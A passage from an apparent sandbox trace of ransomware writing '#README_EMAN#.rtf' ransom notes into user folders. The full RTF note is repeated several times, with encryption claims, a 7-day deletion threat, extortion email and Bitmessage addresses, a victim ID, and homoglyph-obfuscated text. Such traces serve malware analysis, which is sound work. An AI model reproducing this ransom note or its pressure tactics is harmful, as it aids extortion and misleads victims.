th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0295.514] WriteFile (in: hFile=0x2ec, lpBuffer=0x236ff98*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x236ff98*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0295.515] CloseHandle (hObject=0x2ec) returned 1 [0295.515] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pt-pt\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pt-pt\\#readme_eman#.rtf")) returned 0xffffffff [0295.515] GetLastError () returned 0x2 [0295.515] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\pt-pt\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\pt-pt\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2ec [0295.546] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.546] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.546] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is 